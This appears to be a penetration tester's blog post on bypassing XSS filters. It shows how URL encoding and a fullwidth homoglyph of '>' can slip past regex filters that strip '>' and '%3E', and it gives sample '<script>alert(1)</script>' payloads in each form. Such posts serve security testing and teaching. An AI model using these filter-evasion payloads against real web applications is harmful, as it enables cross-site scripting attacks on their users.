As with most articles I write, this post comes from a particular engagement where I was tasked with re-testing fixes engineers put in place for an XSS (Cross-Site Scripting) vulnerability. While the details of the exploit will not be discussed here, the bypass technique using homoglyphs is fair game.
What’s a ‘Homoglyph’?
According to Wikipedia,
…a homoglyph is one of two or more graphemes, characters, or glyphs with shapes that appear identical or very similar.
https://en.wikipedia.org/wiki/Homoglyph
What this means in practice is that homoglyphs are characters that look nearly identical to one another. When applied to computers, these are often Unicode characters that closely resemble plain ASCII ones. Consider the following example:
domain.com
domàіn.com
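Printing the code points behind each string makes the difference visible. The snippet below is only an illustrative sketch: the helper name `codePoints` is hypothetical, and the look-alike string is assumed to use U+00E0 (a with grave) and U+0456 (Cyrillic i), written as escapes so there is no ambiguity about what is being compared.

```javascript
// Hypothetical helper: list each character's Unicode code point.
function codePoints(text) {
  return Array.from(text, (ch) =>
    "U+" + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, "0")
  );
}

const plain = "domain.com";
// Assumed look-alike: U+00E0 (a with grave) and U+0456 (Cyrillic i).
const lookalike = "dom\u00e0\u0456n.com";

console.log(plain === lookalike);                          // false
console.log(codePoints(plain).slice(3, 5).join(", "));     // U+0061, U+0069
console.log(codePoints(lookalike).slice(3, 5).join(", ")); // U+00E0, U+0456
```

The two strings render almost identically, yet a strict comparison treats them as unrelated.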
Another example could be:
<script>alert(1)</script> // URL-Encoded >: %3E
<script＞alert(1)</script＞ // URL-Encoded ＞: %EF%BC%9E
Whether or not you think homoglyphs look the same is up to you; computers, however, are sometimes kind of stupid. What you see as an “à” character can mean something else entirely to a computer, even a plain old ‘a’. The same goes for angle brackets: ＞ (%EF%BC%9E) can actually be interpreted as > (%3E), for example when some component normalizes Unicode before using the value. Different characters, potentially interpreted the same!
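Both halves of that claim can be checked directly. This is a sketch that assumes the look-alike is U+FF1E (FULLWIDTH GREATER-THAN SIGN), which is what %EF%BC%9E decodes to, and that some later stage applies Unicode NFKC normalization. Whether a given application actually normalizes this way is an assumption that has to be tested per target.

```javascript
const ascii = ">";          // U+003E
const fullwidth = "\uFF1E"; // U+FF1E, the assumed homoglyph

console.log(encodeURIComponent(ascii));     // %3E
console.log(encodeURIComponent(fullwidth)); // %EF%BC%9E

// Different characters as far as a strict comparison is concerned...
console.log(ascii === fullwidth); // false

// ...but compatibility normalization (NFKC) folds one into the other.
console.log(fullwidth.normalize("NFKC") === ascii); // true
```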
Knowing this, homoglyphs can be used to provide ample sets of bypasses for regexes, WAFs (Web Application Firewalls), and various other kinds of validation.
The Defense
Let’s say our target web application has some filtering in place to block malicious characters from being supplied. In this case, script tags are stripped if detected on the client and server. Let’s take a look at a super simple filter written in JavaScript.
var someInput = document.getElementById('input').value; // <script>alert(1)</script>
var filtered = someInput.replace(/>/g, ""); // remove every '>' character
// filtered is now: <scriptalert(1)</script
In the example above, you can see that the > symbol gets stripped by the regex that detects it. Let’s not get deterred by this, however.
The First Bypass
Let’s consider URL encoding/decoding for a moment: the process by which characters are encoded in a format that can be safely transmitted over the internet. The syntax is a % followed by two hexadecimal digits. Characters like @ become %40, and, for our purposes, > becomes %3E.
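The mapping is easy to verify with JavaScript's built-ins. A quick sketch (the variable names are only illustrative):

```javascript
// The two characters after '%' are the byte value in hexadecimal.
const hexOfAt = "@".charCodeAt(0).toString(16).toUpperCase(); // "40"
const hexOfGt = ">".charCodeAt(0).toString(16).toUpperCase(); // "3E"

// The built-in functions apply the same mapping in both directions.
const encoded = encodeURIComponent("@>");           // "%40%3E"
const decoded = decodeURIComponent("%3Cscript%3E"); // "<script>"

console.log(hexOfAt, hexOfGt, encoded, decoded);
```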
When you feed encoded characters to an application, the filter may treat them as plain text, but if they are decoded somewhere on the way to the victim’s browser, they end up being interpreted as the characters they encode. Meaning, %3E can potentially be decoded to > and your supplied string is then seen as valid HTML.
Now let’s go back to the drawing board.
var someInput = document.getElementById('input').value; // <script%3Ealert(1)</script%3E
var filtered = someInput.replace(/>/g, ""); // remove every '>' character; %3E is not matched
// once decoded: <script>alert(1)</script>
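The same flow can be run outside the browser. The sketch below is a simplified simulation, not the target application's code: `naiveFilter` stands in for the filter above, and `laterStage` is a hypothetical downstream step that URL-decodes the value before it is written into the page.

```javascript
// Stand-in for the filter above: removes literal '>' only.
function naiveFilter(input) {
  return input.replace(/>/g, "");
}

// Hypothetical downstream step that URL-decodes before rendering.
function laterStage(value) {
  return decodeURIComponent(value);
}

const payload = "<script%3Ealert(1)</script%3E";
const filtered = naiveFilter(payload); // unchanged: no literal '>' present
const rendered = laterStage(filtered);

console.log(filtered); // <script%3Ealert(1)</script%3E
console.log(rendered); // <script>alert(1)</script>
```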
Now suppose the engineers catch on and the %3E encoding gets blocked as well! There’s one more trick up our sleeve.
The Homoglyph Attack
Given we know our application will strip > and its encoded value of %3E, we’d want to give homoglyphs a try. We can apply this technique to the > character as well as to its encoded value.
Bypassing >:
var someInput = document.getElementById('input').value; // <script＞alert(1)</script＞
var filtered = someInput.replace(/>/g, "").replace(/%3E/ig, ""); // remove '>' and '%3E'; the look-alike ＞ is not matched
// if ＞ is later treated as >: <script>alert(1)</script>
Bypassing %3E:
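var someInput = document.getElementById('input').value; // <script%EF%BC%9Ealert(1)</script%EF%BC%9E
var filtered = someInput.replace(/>/g, "").replace(/%3E/ig, ""); // remove '>' and '%3E'; %EF%BC%9E is not matched
// if decoded and ＞ is later treated as >: <script>alert(1)</script>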
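Running both payloads through a simulated pipeline shows why the stricter filter still misses them. This is a sketch under stated assumptions: `strictFilter` mirrors a filter that strips > and %3E, while `normalizingStage` is hypothetical and stands for any downstream component that URL-decodes and then applies NFKC normalization. Real applications may normalize differently, or not at all.

```javascript
// Mirrors a filter that removes '>' and its encoding %3E.
function strictFilter(input) {
  return input.replace(/>/g, "").replace(/%3E/gi, "");
}

// Hypothetical downstream step: URL-decode, then NFKC-normalize.
function normalizingStage(value) {
  return decodeURIComponent(value).normalize("NFKC");
}

// U+FF1E (fullwidth '>') supplied literally and percent-encoded.
const literalPayload = "<script\uFF1Ealert(1)</script\uFF1E";
const encodedPayload = "<script%EF%BC%9Ealert(1)</script%EF%BC%9E";

for (const payload of [literalPayload, encodedPayload]) {
  const filtered = strictFilter(payload);  // nothing matches, so unchanged
  console.log(filtered === payload);       // true
  console.log(normalizingStage(filtered)); // <script>alert(1)</script>
}
```

If the downstream step does not normalize, the payload stays inert, which is why this bypass depends entirely on how the target handles Unicode after filtering.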
So, where else can you take this kind of attack?
While homoglyphs can certainly be used to bypass web application controls, there are other applications, such as purchasing look-alike domains or social engineering, so feel free to think outside of the box: